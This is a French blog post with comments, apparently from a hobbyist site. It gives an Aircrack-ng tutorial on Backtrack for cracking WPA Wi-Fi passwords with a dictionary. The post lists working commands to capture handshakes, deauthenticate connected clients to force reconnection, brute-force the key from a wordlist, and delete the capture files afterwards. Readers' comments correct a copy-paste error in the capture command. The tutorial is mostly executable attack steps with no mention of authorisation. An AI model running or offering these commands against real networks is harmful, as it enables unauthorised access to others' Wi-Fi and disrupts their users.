acebook

Pages

mercredi 8 avril 2009

[Backtrack 5 R3] Crack WPA Avec Dico

Commentaires → 5
Aircrack-ng
CRACK WPA Avec Dico

1.Intialisez la carte wlan0
Sauvegardez raz dans "root"
(wlan0 par default,changez sinon le fichier raz) 
Dans un terminal tapez:
bash raz

2.Analysez les réseaux wifi
airodump-ng mon0

3.Capturer le handshake
airodump-ng -c 6 -w capture -- encrypt wpa mon0
aireplay-ng -0 1 -e ESSID mon0

4.Crack avec Dico
aircrack-ng -w dico.txt *.cap

5.Supprimer les fichiers .cap .xor etc...
 Sauvegardez rm dans "root"
Dans un terminal tapez:
bash rm


Autre façon pour forcer l'utilisateur à se déconnecter:
aireplay-ng -0 0 -a AP_MAC -c CLIENT_MAC mon0
aireplay-ng -0 0 -a AP_MAC mon0

5 commentaires:

Unknown a dit…

salut ;)

il me semble qu'il y a une erreur sur ton tuto relis toi ;)

dragoncity a dit…

Heu...je ne vois pas!
Dis l'erreur au lieu de dire ça ;-)

Unknown a dit…

bon du coup ;)

je reprends:

[Backtrack 5 R3] Crack WPA Avec Dico

Aircrack-ng
CRACK WPA Avec Dico

1.Intialisez la carte wlan0
Sauvegardez raz dans "root"
(wlan0 par default,changez sinon le fichier raz)
Dans un terminal tapez:
bash raz

2.Analysez les réseaux wifi
airodump-ng mon0

3.Capturer le handshake
airodump-ng -c 6 -w capture -- encrypt wep mon0
aireplay-ng -0 1 -e ESSID mon0

4.Crack avec Dico
aircrack-ng -w dico.txt *.cap

5.Supprimer les fichiers .cap .xor etc...
Sauvegardez rm dans "root"
Dans un terminal tapez:
bash rm


tu indique craquer une clef WPA ok ;) mais en 3. quand tu veux cap le handshake dans ta ligne de commande tu mets un WEP
et c'est exactement la meme ligne que dans le tuto du WEP ;)

ensuite tu mets aussi le canal 6 dans le tuto d'apres tu précises bien qu'il faut le changer mais bon... des fois que... certains s’arrêtent de lire trop tot les tutos !

dragoncity a dit…

Ha oui comme ça je préfère :)

Effectivement j'avais fait un copier/coller car les commandes se ressemblent,et oui le wpa est passé a la trappe,c'est maintenant corrigé,merci ! :)

Unknown a dit…

pas de soucis ;)